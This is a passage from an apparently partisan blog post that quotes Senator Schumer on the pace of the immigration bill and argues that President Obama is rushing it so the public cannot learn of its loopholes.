Schumer was quotes as saying<\/a> &#8220;He doesn&#8217;t want to drag this out because that&#8217;s the way bills get killed,&#8221; Schumer said.<\/p>\n<p>Why the haste? Because president Obama knows that the more time that the American public has to learn about the loopholes in the amnesty bill the greater will be the opposition to its adoption. Apparently, that also means that he thinks that Congress might be swayed by the electorate that put them in office.
